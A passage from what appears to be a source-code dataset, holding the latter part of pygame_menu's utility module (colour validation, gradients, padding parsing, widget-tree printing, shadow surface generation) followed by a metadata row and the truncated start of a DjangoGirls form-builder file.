'set_pygame_cursor',
'uuid4',
'warn',
'widget_terminal_title',
# Constants
'PYGAME_V2',
# Classes
'ShadowGenerator',
'TerminalColors'
]
import sys
import traceback
import uuid
import warnings
import pygame
import pygame_menu
from pygame_menu.locals import ALIGN_CENTER, ALIGN_LEFT, ALIGN_RIGHT, POSITION_CENTER, \
POSITION_NORTH, POSITION_SOUTH, POSITION_SOUTHEAST, POSITION_NORTHWEST, \
POSITION_WEST, POSITION_EAST, POSITION_NORTHEAST, POSITION_SOUTHWEST, \
ORIENTATION_HORIZONTAL, ORIENTATION_VERTICAL, FINGERDOWN, FINGERUP, FINGERMOTION
from pygame_menu._types import ColorType, ColorInputType, Union, List, Vector2NumberType, \
NumberType, Any, Optional, Tuple, NumberInstance, VectorInstance, PaddingInstance, \
PaddingType, Tuple4IntType, ColorInputInstance, VectorType, EventType, \
CursorInputInstance, CursorInputType, Tuple2IntType, Dict, Tuple3IntType
PYGAME_V2 = pygame.version.vernum[0] >= 2
WARNINGS_LAST_MESSAGES: Dict[int, bool] = {}
def assert_alignment(align: str) -> None:
"""
Assert that a certain alignment is valid.
:param align: Align value
"""
assert isinstance(align, str), f'alignment "{align}" must be a string'
assert align in (ALIGN_LEFT, ALIGN_CENTER, ALIGN_RIGHT), \
f'incorrect alignment value "{align}"'
def assert_color(
color: Union[ColorInputType, List[int]],
warn_if_invalid: bool = True
) -> ColorType:
"""
Assert that a certain color is valid.
:param color: Object color
:param warn_if_invalid: If ``True`` warns if the color is invalid
:return: Formatted color if valid, else, throws an ``AssertionError`` exception
"""
color = format_color(color, warn_if_invalid=warn_if_invalid)
assert isinstance(color, VectorInstance), \
f'color must be a tuple or list, not type "{type(color)}"'
assert 4 >= len(color) >= 3, \
'color must be a tuple or list of 3 or 4 numbers'
for i in range(3):
assert isinstance(color[i], int), \
f'"{color[i]}" in element color {color} must be an integer, not type "{type(color)}"'
assert 0 <= color[i] <= 255, \
f'"{color[i]}" in element color {color} must be an integer between 0 and 255'
if len(color) == 4:
assert isinstance(color[3], int), \
f'alpha channel must be an integer between 0 and 255, not type "{type(color)}"'
assert 0 <= color[3] <= 255, \
f'opacity of color {color} must be an integer between 0 and 255; ' \
f'where 0 is fully-transparent and 255 is fully-opaque'
return color
def assert_cursor(cursor: CursorInputType) -> None:
"""
Assert a given cursor is valid.
:param cursor: Cursor object
"""
assert isinstance(cursor, CursorInputInstance), \
'cursor instance invalid, it can be None, an integer, ' \
'or pygame.cursors.Cursor'
def assert_list_vector(list_vector: Union[List[Vector2NumberType], Tuple[Vector2NumberType, ...]],
length: int) -> None:
"""
Assert that a list fixed length vector is numeric.
:param list_vector: Numeric list vector
:param length: Length of the required vector. If ``0`` don't check the length
"""
assert isinstance(list_vector, VectorInstance), \
f'list_vector "{list_vector}" must be a tuple or list'
for v in list_vector:
assert_vector(v, length)
def assert_orientation(orientation: str) -> None:
"""
Assert that a certain widget orientation is valid.
:param orientation: Object orientation
"""
assert isinstance(orientation, str), \
f'orientation "{orientation}" must be a string'
assert orientation in (ORIENTATION_HORIZONTAL, ORIENTATION_VERTICAL), \
f'invalid orientation value "{orientation}"'
def assert_position(position: str) -> None:
"""
Assert that a certain position is valid.
:param position: Object position
"""
assert isinstance(position, str), \
f'position "{position}" must be a string'
assert position in (POSITION_WEST, POSITION_SOUTHWEST, POSITION_SOUTH,
POSITION_SOUTHEAST, POSITION_EAST, POSITION_NORTH,
POSITION_NORTHWEST, POSITION_NORTHEAST, POSITION_CENTER), \
f'invalid position value "{position}"'
def assert_position_vector(position: Union[str, List[str], Tuple[str, ...]]) -> None:
"""
Assert that a position vector is valid.
:param position: Object position
"""
if isinstance(position, str):
assert_position(position)
else:
assert isinstance(position, VectorInstance)
unique = []
for pos in position:
assert_position(pos)
if pos not in unique:
unique.append(pos)
assert len(unique) == len(position), 'there cannot be repeated positions'
def assert_vector(
num_vector: VectorType,
length: int,
instance: type = NumberInstance
) -> None:
"""
Assert that a fixed length vector is numeric.
:param num_vector: Numeric vector
:param length: Length of the required vector. If ``0`` don't check the length
:param instance: Instance of each item of the vector
"""
assert isinstance(num_vector, VectorInstance), \
f'vector "{num_vector}" must be a list or tuple of {length} items if type {instance}'
if length != 0:
assert len(num_vector) == length, \
f'vector "{num_vector}" must contain {length} numbers only, ' \
f'but {num_vector} were given'
for i in range(len(num_vector)):
num = num_vector[i]
if instance == int and isinstance(num, float) and int(num) == num:
num = int(num)
assert isinstance(num, instance), \
f'item {num} of vector must be {instance}, not type "{type(num)}"'
def check_key_pressed_valid(event: EventType) -> bool:
"""
Checks if the pressed key is valid.
:param event: Key press event
:return: ``True`` if a key is pressed
"""
# If the system detects that any key event has been pressed but
# there's not any key pressed then this method raises a KEYUP
# flag
bad_event = not (True in pygame.key.get_pressed())
if bad_event:
if 'test' in event.dict and event.dict['test']:
return True
ev = pygame.event.Event(pygame.KEYUP, {'key': event.key})
pygame.event.post(ev)
return not bad_event
def fill_gradient(
surface: 'pygame.Surface',
color: ColorInputType,
gradient: ColorInputType,
rect: Optional['pygame.Rect'] = None,
vertical: bool = True,
forward: bool = True
) -> None:
"""
Fill a surface with a gradient pattern.
:param surface: Surface to fill
:param color: Starting color
:param gradient: Final color
:param rect: Area to fill; default is surface's rect
:param vertical: True=vertical; False=horizontal
:param forward: True=forward; False=reverse
"""
if rect is None:
rect = surface.get_rect()
x1, x2 = rect.left, rect.right
y1, y2 = rect.top, rect.bottom
color = assert_color(color)
gradient = assert_color(gradient)
if vertical:
h = y2 - y1
else:
h = x2 - x1
if forward:
a, b = color, gradient
else:
b, a = color, gradient
rate = (
float(b[0] - a[0]) / h,
float(b[1] - a[1]) / h,
float(b[2] - a[2]) / h
)
fn_line = pygame.draw.line
if vertical:
for line in range(y1, y2):
color = (
min(max(a[0] + (rate[0] * (line - y1)), 0), 255),
min(max(a[1] + (rate[1] * (line - y1)), 0), 255),
min(max(a[2] + (rate[2] * (line - y1)), 0), 255)
)
fn_line(surface, color, (x1, line), (x2, line))
else:
for col in range(x1, x2):
color = (
min(max(a[0] + (rate[0] * (col - x1)), 0), 255),
min(max(a[1] + (rate[1] * (col - x1)), 0), 255),
min(max(a[2] + (rate[2] * (col - x1)), 0), 255)
)
fn_line(surface, color, (col, y1), (col, y2))
def format_color(
color: Union[ColorInputType, Any],
warn_if_invalid: bool = True
) -> Union[ColorType, Any]:
"""
Format color from string, int, or tuple to tuple type.
Available formats:
- Color name str: name of the color to use, e.g. ``"red"`` (all the supported name strings can be found in the colordict module, see https://github.com/pygame/pygame/blob/main/src_py/colordict.py)
- HTML color format str: ``"#rrggbbaa"`` or ``"#rrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided
- Hex number str: ``"0xrrggbbaa"`` or ``"0xrrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided
- int: int value of the color to use, using hex numbers can make this parameter more readable, e.g. ``0xrrggbbaa``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, note that the aa (alpha) value is not optional for the int format and must be provided
- tuple/list of int color values: ``(R, G, B, A)`` or ``(R, G, B)``, where R, G, B, and A are int values in the range of ``0`` to ``255`` inclusive, the A (alpha) value defaults to ``255`` (opaque) if not provided
:param color: Color to format. If format is valid returns the same input value
:param warn_if_invalid: If ``True`` warns if the color is invalid
:return: Color in (r, g, b, a) format
"""
if not isinstance(color, ColorInputInstance):
return color
if not isinstance(color, pygame.Color):
if isinstance(color, str):
if len(color) == 4 and color[0] == '#':
r, g, b = color[1], color[2], color[3]
color = f'#{r * 2}{g * 2}{b * 2}'
try:
if isinstance(color, VectorInstance) and 3 <= len(color) <= 4:
if PYGAME_V2:
for j in color:
if not isinstance(j, int):
raise ValueError('color cannot contain floating point values')
c = pygame.Color(*color)
else:
c = pygame.Color(color)
except ValueError:
if warn_if_invalid:
warn(f'invalid color value "{color}"')
else:
raise
return color
else:
c = color
return c.r, c.g, c.b, c.a
def get_cursor() -> CursorInputType:
"""
Return the pygame cursor object.
:return: Cursor object
"""
try:
return pygame.mouse.get_cursor()
except TypeError as e:
warn(str(e))
return None
def get_finger_pos(menu: Optional['pygame_menu.Menu'], event: EventType) -> Tuple2IntType:
"""
Return the position from finger (or mouse) event on x-axis and y-axis (x, y).
:param menu: Menu object for relative positioning in finger events
:param event: Pygame event object
:return: Position on x-axis and y-axis (x, y) in px
"""
if event.type in (FINGERDOWN, FINGERMOTION, FINGERUP):
assert menu is not None, \
'menu reference cannot be none while using finger position'
display_size = menu.get_window_size()
finger_pos = (int(event.x * display_size[0]), int(event.y * display_size[1]))
return finger_pos
return event.pos
def is_callable(func: Any) -> bool:
"""
Return ``True`` if ``func`` is callable.
:param func: Function object
:return: ``True`` if function
"""
e = 'is_callable(func) method will be removed in v5, consider using built-in' \
' callable(func) method instead'
warnings.warn(e, DeprecationWarning)
return callable(func)
def load_pygame_image_file(image_path: str, **kwargs) -> 'pygame.Surface':
"""
Loads an image and returns a surface.
:param image_path: Image file
:param kwargs: Optional keyword arguments
:return: Surface
"""
# Try to load the image
try:
if 'test' in kwargs.keys():
raise pygame.error('File is not a Windows BMP file')
surface = pygame.image.load(image_path)
except pygame.error as exc:
# Check if file is not a Windows file
if str(exc) == 'File is not a Windows BMP file':
pil_invalid_exception = Exception
# Check if Pillow exists
try:
# noinspection PyPackageRequirements
from PIL import Image, UnidentifiedImageError
pil_invalid_exception = UnidentifiedImageError
img_pil = Image.open(image_path)
# noinspection PyTypeChecker
surface = pygame.image.fromstring(
img_pil.tobytes(), img_pil.size, img_pil.mode).convert()
except (ModuleNotFoundError, ImportError):
warn(f'Image file "{image_path}" could not be loaded, as pygame.error '
f'is raised. To avoid this issue install the Pillow library')
raise
except pil_invalid_exception:
warn(f'The image "{image_path}" could not be loaded using Pillow')
raise
else:
raise
return surface
def make_surface(
width: NumberType,
height: NumberType,
alpha: bool = False,
fill_color: Optional[ColorInputType] = None
) -> 'pygame.Surface':
"""
Creates a pygame surface object.
:param width: Surface width
:param height: Surface height
:param alpha: Enable alpha channel on surface
:param fill_color: Fill surface with a certain color
:return: Pygame surface
"""
assert isinstance(width, NumberInstance)
assert isinstance(height, NumberInstance)
assert isinstance(alpha, bool)
assert width >= 0 and height >= 0, \
'surface width and height must be equal or greater than zero'
surface = pygame.Surface((int(width), int(height)), pygame.SRCALPHA, 32)
if alpha:
# noinspection PyArgumentList
surface = pygame.Surface.convert_alpha(surface)
if fill_color is not None:
fill_color = assert_color(fill_color)
surface.fill(fill_color)
return surface
def mouse_motion_current_mouse_position() -> EventType:
"""
Return a pygame event type MOUSEMOTION in the current mouse position.
:return: Event
"""
x, y = pygame.mouse.get_pos()
return pygame.event.Event(pygame.MOUSEMOTION, {'pos': (int(x), int(y))})
def parse_padding(padding: PaddingType) -> Tuple4IntType:
"""
Get the padding value from tuple.
- If an integer or float is provided: top, right, bottom and left values will be the same
- If 2-item tuple is provided: top and bottom takes the first value, left and right the second
- If 3-item tuple is provided: top will take the first value, left and right the second, and bottom the third
- If 4-item tuple is provided: padding will be (top, right, bottom, left)
.. note::
See `CSS W3Schools <https://www.w3schools.com/css/css_padding.asp>`_ for more info about padding.
:param padding: Can be a single number, or a tuple of 2, 3 or 4 elements following CSS style
:return: Padding value, (top, right, bottom, left), in px
"""
if padding is False or None:
padding = 0
assert isinstance(padding, PaddingInstance)
if isinstance(padding, NumberInstance):
assert padding >= 0, 'padding cannot be a negative number'
return int(padding), int(padding), int(padding), int(padding)
else:
assert 1 <= len(padding) <= 4, 'padding must be a tuple of 2, 3 or 4 elements'
for i in range(len(padding)):
assert isinstance(padding[i], NumberInstance), \
'all padding elements must be integers or floats'
assert padding[i] >= 0, \
'all padding elements must be equal or greater than zero'
if len(padding) == 1:
return int(padding[0]), int(padding[0]), int(padding[0]), int(padding[0])
elif len(padding) == 2:
return int(padding[0]), int(padding[1]), int(padding[0]), int(padding[1])
elif len(padding) == 3:
return int(padding[0]), int(padding[1]), int(padding[2]), int(padding[1])
else:
return int(padding[0]), int(padding[1]), int(padding[2]), int(padding[3])
def print_menu_widget_structure(
widgets: List['pygame_menu.widgets.Widget'],
index: int
) -> None:
"""
Test printing widgets order.
.. note::
- Φ Floating status
- ⇇ Selected
- !▲ Widget is not appended to current menu
- ╳ Widget is hidden
- ∑ Scrollable frame sizing
- β Widget is not selectable
- {x,y} Widget *column, row* position
- <x,y> Frame indices (min, max)
:param widgets: Menu widgets list
:param index: Menu index
"""
indx = 0
current_depth = 0
depth_widths = {}
c = TerminalColors
def close_frames(depth: int) -> None:
"""
Close frames up to current depth.
:param depth: Depth to close
"""
d = current_depth - depth
for i in range(d):
j = depth + d - (i + 1) # Current depth
line = f'· {"│ " * j}└{"┄" * 3}' # * depth_widths[j]
print(c.BRIGHT_WHITE + line.ljust(0, '━') + c.ENDC) # 80 also work
non_menu_frame_widgets: Dict[int, List['pygame_menu.widgets.Widget']] = {}
def process_non_menu_frame(w_indx: int) -> None:
"""
Print non-menu frames list.
:param w_indx: Current iteration index to print widgets
"""
for nmi in list(non_menu_frame_widgets.keys()):
if nmi == w_indx:
v = non_menu_frame_widgets[nmi]
for v_wid in v:
try:
print(c.BRIGHT_WHITE + '· ' + '│ ' * v_wid.get_frame_depth()
+ c.ENDC + widget_terminal_title(v_wid))
except UnicodeEncodeError:
pass
del non_menu_frame_widgets[nmi]
for w in widgets:
w_depth = w.get_frame_depth()
close_frames(w.get_frame_depth())
title = widget_terminal_title(w, indx, index)
try:
print('{0}{1}{2}'.format(
str(indx).ljust(3),
' ' + c.BRIGHT_WHITE + '│ ' * w_depth + c.ENDC,
title
))
except UnicodeEncodeError:
pass
if w_depth not in depth_widths.keys():
depth_widths[w_depth] = 0
# depth_widths[w_depth] = max(int(len(title) * 1.2) + 3, depth_widths[w_depth])
depth_widths[w_depth] = len(title) - 2
current_depth = w.get_frame_depth()
process_non_menu_frame(indx)
jw = widgets[0]
try:
if isinstance(w, pygame_menu.widgets.Frame): # Print ordered non-menu widgets
current_depth += 1
prev_indx = indx
for jw in w.get_widgets(unpack_subframes=False):
if jw.get_menu() is None or jw not in widgets:
if prev_indx not in non_menu_frame_widgets.keys():
non_menu_frame_widgets[prev_indx] = []
non_menu_frame_widgets[prev_indx].append(jw)
else:
prev_indx = widgets.index(jw)
except ValueError as e:
print(f'[ERROR] while requesting widget {jw.get_class_id()}')
warn(str(e))
indx += 1
process_non_menu_frame(indx)
close_frames(0)
def set_pygame_cursor(cursor: CursorInputType) -> None:
"""
Set pygame cursor.
:param cursor: Cursor object
"""
try:
if cursor is not None:
# noinspection PyArgumentList
pygame.mouse.set_cursor(cursor)
except (pygame.error, TypeError):
if PYGAME_V2:
warn(f'could not establish widget cursor, invalid value {cursor}')
def uuid4(short: bool = False) -> str:
"""
Create custom version of uuid4.
:param short: If ``True`` only returns the first 8 chars of the uuid, else, 18
:return: UUID of 18 chars
"""
return str(uuid.uuid4())[:18 if not short else 8]
def warn(message: str, print_stack: bool = True) -> None:
"""
Warnings warn method.
:param message: Message to warn about
:param print_stack: Print stack trace of the call
"""
assert isinstance(message, str)
# noinspection PyUnresolvedReferences,PyProtectedMember
frame = sys._getframe().f_back
# frame_info = inspect.getframeinfo(frame) # Traceback(filename, lineno, function, code_context, index)
# Check if message in dict
msg_hash = hash(message)
msg_in_hash = False
try:
msg_in_hash = WARNINGS_LAST_MESSAGES[msg_hash]
except KeyError:
pass
if not msg_in_hash and print_stack:
traceback.print_stack(frame, limit=5)
WARNINGS_LAST_MESSAGES[msg_hash] = True
# warnings.showwarning(message, UserWarning, frame_info[0], frame_info[1])
warnings.warn(message, stacklevel=2)
def widget_terminal_title(
widget: 'pygame_menu.widgets.Widget',
widget_index: int = -1,
current_index: int = -1
) -> str:
"""
Return widget title to be printed on terminals.
:param widget: Widget to get title from
:param widget_index: Widget index
:param current_index: Menu index
:return: Widget title
"""
w_class_id = TerminalColors.BOLD + widget.get_class_id() + TerminalColors.ENDC
if isinstance(widget, pygame_menu.widgets.Frame):
w_title = TerminalColors.BRIGHT_WHITE + '┌━' + TerminalColors.ENDC
w_title += f'{0} - {3}[{1},{2},'.format(w_class_id, *widget.get_indices(), TerminalColors.LGREEN)
if widget.horizontal:
w_title += 'H] '
else:
w_title += 'V] '
if widget.is_scrollable:
wsz = widget.get_inner_size()
wsm = widget.get_max_size()
wsh = wsm[0] if wsm[0] == wsz[0] else f'{wsm[0]}→{wsz[0]}'
wsv = wsm[1] if wsm[1] == wsz[1] else f'{wsm[1]}→{wsz[1]}'
w_title += f'∑ [{wsh},{wsv}] '
w_title += TerminalColors.ENDC
else:
if widget.get_title() != '':
title_f = TerminalColors.UNDERLINE + widget.get_title() + TerminalColors.ENDC
w_title = f'{w_class_id} - {title_f} - '
else:
w_title = w_class_id + ' - '
# Column/Row position
w_title += TerminalColors.INDIGO
cr = widget.get_col_row_index()
w_title += '{' + str(cr[0]) + ',' + str(cr[1]) + '}'
w_title += TerminalColors.ENDC
# Add position
w_title += TerminalColors.MAGENTA
w_title += ' ({0},{1})'.format(*widget.get_position())
w_title += TerminalColors.ENDC
# Add size
w_title += TerminalColors.BLUE
w_title += ' ({0},{1})'.format(*widget.get_size())
w_title += TerminalColors.ENDC
# Add mods
w_title += TerminalColors.CYAN
if widget.is_floating():
w_title += ' Φ'
if not widget.is_visible():
w_title += ' ╳'
if not widget.is_selectable:
w_title += ' β'
if widget.is_selected():
w_title += TerminalColors.BOLD + ' ⟵'
if current_index != -1 and current_index != widget_index:
w_title += f'! [{widget_index}->{current_index}]'
if widget.get_menu() is None:
w_title += ' !▲'
w_title += TerminalColors.ENDC
return w_title
class TerminalColors(object):
"""
Terminal colors.
See https://www.lihaoyi.com/post/BuildyourownCommandLinewithANSIescapecodes.html.
"""
BLUE = '\u001b[38;5;27m'
BOLD = '\033[1m'
BRIGHT_MAGENTA = '\u001b[35;1m'
BRIGHT_WHITE = '\u001b[37;1m'
CYAN = '\u001b[36m'
ENDC = '\u001b[0m'
GRAY = '\u001b[30;1m'
INDIGO = '\u001b[38;5;129m'
LGREEN = '\u001b[38;5;150m'
MAGENTA = '\u001b[35m'
RED = '\u001b[31m'
UNDERLINE = '\033[4m'
class ShadowGenerator(object):
"""
A class to generate surfaces that work as a 'shadow' for rectangular UI elements. Base shadow
surface are generated with an algorithm, then when one is requested at a specific size the
closest pre-generated shadow surface is picked and then scaled to the exact size requested.
By default, it creates four base shadows in a small range of sizes. If you find the shadow
appearance unsatisfactory then it is possible to create closer to the size of the
elements you are having trouble with.
Source: https://github.com/MyreMylar/pygame_gui with many edits.
"""
_created_ellipse_shadows: Dict[str, 'pygame.Surface']
_preloaded_shadow_corners: Dict[str, Dict[str, 'pygame.Surface']]
_short_term_rect_cache: Dict[str, 'pygame.Surface']
def __init__(self) -> None:
self._created_ellipse_shadows = {}
self._preloaded_shadow_corners = {}
self._short_term_rect_cache = {}
def clear_short_term_caches(self, force: bool = False) -> None:
"""
Empties short term caches, so we aren't hanging on to so many surfaces.
:param force: Force clear
"""
t = len(self._created_ellipse_shadows) + len(self._preloaded_shadow_corners) + \
len(self._short_term_rect_cache)
if t >= 100 or force:
self._created_ellipse_shadows.clear()
self._preloaded_shadow_corners.clear()
self._short_term_rect_cache.clear()
def _create_shadow_corners(
self,
shadow_width_param: int,
corner_radius_param: int,
color: Tuple3IntType,
aa_amount: int = 4
) -> Dict[str, 'pygame.Surface']:
"""
Create corners for our rectangular shadows. These can be used across many
sizes of shadow with the same shadow width and corner radius.
:param shadow_width_param: Width of the shadow
:param corner_radius_param: Corner radius of the shadow
:param color: Shadow color
:param aa_amount: Anti-aliasing amount. Defaults to 4x
:return: Dict that contain the shadows of each border
"""
shadow_width_param = max(1, shadow_width_param)
corner_rect = pygame.Rect(
0, 0,
corner_radius_param * aa_amount,
corner_radius_param * aa_amount
)
corner_surface, edge_surface = self._create_single_corner_and_edge(
aa_amount=aa_amount,
corner_radius_param=corner_radius_param,
corner_rect=corner_rect,
shadow_width_param=shadow_width_param,
color=color
)
sub_radius = ((corner_radius_param - shadow_width_param) * aa_amount)
top_edge = pygame.transform.smoothscale(edge_surface,
(shadow_width_param, shadow_width_param))
left_edge = pygame.transform.rotate(top_edge, 90)
tl_corner = pygame.transform.smoothscale(corner_surface,
(corner_radius_param,
corner_radius_param))
if sub_radius > 0:
corner_sub_surface = pygame.surface.Surface(corner_rect.size,
flags=pygame.SRCALPHA,
depth=32)
corner_sub_surface.fill(pygame.Color('#00000000'))
pygame.draw.circle(corner_sub_surface,
pygame.Color('#FFFFFFFF'),
corner_rect.size,
sub_radius)
corner_small_sub_surface = pygame.transform.smoothscale(corner_sub_surface,
(corner_radius_param,
corner_radius_param))
tl_corner.blit(corner_small_sub_surface,
(0, 0),
special_flags=pygame.BLEND_RGBA_SUB)
corners_and_edges = {
'bottom': pygame.transform.flip(top_edge, False, True),
'bottom_left': pygame.transform.flip(tl_corner, False, True),
'bottom_right': pygame.transform.flip(tl_corner, True, True),
'left': left_edge,
'right': pygame.transform.flip(left_edge, True, False),
'top': top_edge,
'top_left': tl_corner,
'top_right': pygame.transform.flip(tl_corner, True, False)
}
self._preloaded_shadow_corners[(str(shadow_width_param) +
'x' +
str(corner_radius_param))] = corners_and_edges
return corners_and_edges
@staticmethod
def _create_single_corner_and_edge(
aa_amount: int,
corner_radius_param: int,
corner_rect: 'pygame.Rect',
shadow_width_param: int,
color: Tuple3IntType
) -> Tuple['pygame.Surface', 'pygame.Surface']:
"""
Creates a single corner surface and a single edge surface for a shadow.
:param aa_amount: Amount of anti-aliasing
:param corner_radius_param: Radius of a corner this shadow will go around
:param corner_rect: Rectangular size of corner
:param shadow_width_param: Width of shadow
:param color: Shadow color
:return: A tuple of the corner surface and the edge surface
"""
aa_amount = max(1, aa_amount)
final_corner_surface = pygame.surface.Surface((corner_radius_param * aa_amount,
corner_radius_param * aa_amount),
flags=pygame.SRCALPHA, depth=32)
final_corner_surface.fill(pygame.Color('#00000000'))
final_edge_surface = pygame.surface.Surface((shadow_width_param * aa_amount,
shadow_width_param * aa_amount),
flags=pygame.SRCALPHA, depth=32)
final_edge_surface.fill(pygame.Color('#00000000'))
corner_radius = corner_radius_param * aa_amount
corner_centre = (corner_radius, corner_radius)
edge_rect = pygame.Rect(0, 0,
shadow_width_param * aa_amount,
shadow_width_param * aa_amount)
edge_shadow_fade_height = edge_rect.width
alpha_increment = 20.0 / (shadow_width_param ** 1.5)
shadow_alpha = alpha_increment
r, g, b = color
for _ in range(shadow_width_param):
if corner_rect.width > 0 and corner_rect.height > 0 and corner_radius > 0:
# Edge
edge_shadow_surface = pygame.surface.Surface(
edge_rect.size,
flags=pygame.SRCALPHA,
depth=32)
edge_shadow_surface.fill(pygame.Color('#00000000'))
edge_shadow_surface.fill(pygame.Color(r, g, b, int(shadow_alpha)),
pygame.Rect(0,
edge_rect.height - edge_shadow_fade_height,
edge_rect.width,
edge_shadow_fade_height))
final_edge_surface.blit(edge_shadow_surface,
(0, 0),
special_flags=pygame.BLEND_RGBA_ADD)
# Corner
corner_shadow_surface = pygame.surface.Surface(corner_rect.size,
flags=pygame.SRCALPHA,
depth=32)
corner_shadow_surface.fill(pygame.Color('#00000000'))
pygame.draw.circle(corner_shadow_surface,
pygame.Color(r, g, b, int(shadow_alpha)),
corner_centre,
corner_radius)
final_corner_surface.blit(corner_shadow_surface,
(0, 0),
special_flags=pygame.BLEND_RGBA_ADD)
# increments/decrements
shadow_alpha += alpha_increment
corner_radius -= aa_amount
edge_shadow_fade_height -= aa_amount
return final_corner_surface, final_edge_surface
def create_new_rectangle_shadow(
self,
width: int,
height: int,
shadow_width_param: int,
corner_radius_param: int,
aa_amount: int = 4,
color: Tuple3IntType = (0, 0, 0)
) -> Optional['pygame.Surface']:
"""
Creates a rectangular shadow surface at the specified size and stores it for later use.
:param width: The width of the base shadow to create
:param height: The height of the base shadow to create
:param shadow_width_param: The width of the shadowed edge
:param corner_radius_param: The radius of the rectangular shadow's corners
:param aa_amount: Antialiasing
:param color: Shadow color (r, g, b)
return: Shadow
"""
assert isinstance(width, int)
assert isinstance(height, int)
assert_vector(color, 3, int)
shadow_width_param, corner_radius_param, aa_amount = int(shadow_width_param), \
int(corner_radius_param), int(aa_amount)
if width < corner_radius_param or height < corner_radius_param or shadow_width_param == 0:
return None
r, g, b = color
params = [width, height, shadow_width_param, corner_radius_param, aa_amount, r, g, b]
shadow_id = '_'.join(str(param) for param in params)
if shadow_id in self._short_term_rect_cache:
return self._short_term_rect_cache[shadow_id]
final_surface = pygame.surface.Surface((width, height), flags=pygame.SRCALPHA, depth=32)
final_surface.fill(pygame.Color('#00000000'))
corner_index_id = str(shadow_width_param) + 'x' + str(corner_radius_param)
if corner_index_id in self._preloaded_shadow_corners:
edges_and_corners = self._preloaded_shadow_corners[corner_index_id]
else:
edges_and_corners = self._create_shadow_corners(
shadow_width_param=shadow_width_param,
corner_radius_param=corner_radius_param,
color=color,
aa_amount=aa_amount
)
final_surface.blit(edges_and_corners['top_left'], (0, 0))
final_surface.blit(edges_and_corners['top_right'], (width - corner_radius_param, 0))
final_surface.blit(edges_and_corners['bottom_left'],
(0, height - corner_radius_param))
final_surface.blit(edges_and_corners['bottom_right'],
(width - corner_radius_param, height - corner_radius_param))
if width - (2 * corner_radius_param) > 0:
top_edge = pygame.transform.scale(edges_and_corners['top'],
(width - (2 * corner_radius_param),
shadow_width_param))
bottom_edge = pygame.transform.scale(edges_and_corners['bottom'],
(width - (2 * corner_radius_param),
shadow_width_param))
final_surface.blit(top_edge, (corner_radius_param, 0))
final_surface.blit(bottom_edge, (corner_radius_param, height - shadow_width_param))
if height - (2 * corner_radius_param) > 0:
left_edge = pygame.transform.scale(edges_and_corners['left'],
(shadow_width_param,
height - (2 * corner_radius_param)))
right_edge = pygame.transform.scale(edges_and_corners['right'],
(shadow_width_param,
height - (2 * corner_radius_param)))
final_surface.blit(left_edge, (0, corner_radius_param))
final_surface.blit(right_edge, (width - shadow_width_param,
corner_radius_param))
self._short_term_rect_cache[shadow_id] = final_surface
return final_surface
def create_new_ellipse_shadow(
self,
width: int,
height: int,
shadow_width_param: int,
aa_amount: int = 4,
color: Tuple3IntType = (0, 0, 0)
) -> Optional['pygame.Surface']:
"""
Creates an ellipse shaped shadow surface at the specified size and stores it for later use.
:param width: The width of the shadow to create
:param height: The height of the shadow to create
:param shadow_width_param: The width of the shadowed edge
:param aa_amount: The amount of anti-aliasing to use, defaults to 4
:param color: Shadow color (r, g, b)
:return: Surface with shadow
"""
assert isinstance(width, int)
assert isinstance(height, int)
assert_vector(color, 3, int)
shadow_width_param, aa_amount = int(shadow_width_param), int(aa_amount)
if shadow_width_param == 0:
return None
shadow_surface = pygame.surface.Surface((width * aa_amount, height * aa_amount),
flags=pygame.SRCALPHA, depth=32)
shadow_surface.fill(pygame.Color('#00000000'))
r, g, b = color
ellipse_id = str(width) + 'x' + str(height) + 'x' + str(shadow_width_param)
if ellipse_id in self._created_ellipse_shadows:
return self._created_ellipse_shadows[ellipse_id]
alpha_increment = max(1, int(20 / shadow_width_param))
shadow_alpha = alpha_increment
shadow_width = width * aa_amount
shadow_height = height * aa_amount
for i in range(shadow_width_param):
if shadow_width > 0 and shadow_height > 0:
shadow_rect = pygame.Rect(i * aa_amount,
i * aa_amount,
shadow_width,
shadow_height)
pygame.draw.ellipse(shadow_surface,
pygame.Color(r, g, b, shadow_alpha), shadow_rect)
shadow_width -= (2 * aa_amount)
shadow_height -= (2 * aa_amount)
shadow_alpha += alpha_increment
final_surface = pygame.transform.smoothscale(shadow_surface, (width, height))
self._created_ellipse_shadows[ellipse_id] = final_surface
return final_surface
|
e2058ffa263161b909f39fc2ff6f19e7f584f62d
|
88ce889124078382c9835c2aeca101ca79302bca
|
/applications/questions.py
|
866ac43845f5715e9fea0681c50b41a741c5746b
|
[
"BSD-3-Clause"
] |
permissive
|
DjangoGirls/djangogirls
|
9cb6c145e9fa10bcf3f06a70d025ff31d96346eb
|
2b2fc151354906ac116dd8cd9a9f4f412dee26af
|
refs/heads/main
| 2023-08-30T15:43:27.162564
| 2023-07-27T11:51:40
| 2023-07-27T11:51:40
| 20,439,809
| 504
| 347
|
BSD-3-Clause
| 2023-08-30T09:25:53
| 2014-06-03T11:13:57
|
Python
|
UTF-8
|
Python
| false
| false
| 5,951
|
py
|
questions.py
|
from collections import OrderedDict
from django import forms
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
def get_organiser_menu(page_url):
"""
Get menu entries for organiser-visible pages
"""
menu = [
{"title": _("Applications"), "url": reverse("applications:applications", args=[page_url])},
{"title": _("Messaging"), "url": reverse("applications:communication", args=[page_url])},
]
return menu
def generate_form_from_questions(questions):
fields = OrderedDict()
for question in questions:
options = {
"label": question.title,
"help_text": question.help_text or None,
"required": question.is_required,
}
name = f"question_{question.pk}"
if question.question_type == "text":
options["widget"] = forms.Textarea
if question.question_type == "choices":
choices = ((x, x) for x in question.choices.split(";"))
options["choices"] = choices
if question.question_type in ["paragraph", "text"]:
fields[name] = forms.CharField(**options)
elif question.question_type == "choices":
if question.is_multiple_choice:
options["widget"] = forms.CheckboxSelectMultiple
fields[name] = forms.MultipleChoiceField(**options)
else:
options["widget"] = forms.RadioSelect
fields[name] = forms.ChoiceField(**options)
if question.question_type == "email":
fields[name] = forms.EmailField(**options)
fields["newsletter_optin"] = forms.ChoiceField(
widget=forms.RadioSelect,
label=_("Do you want to receive news from the Django Girls team?"),
help_text=_(
"No spam, pinky swear! Only helpful programming tips and "
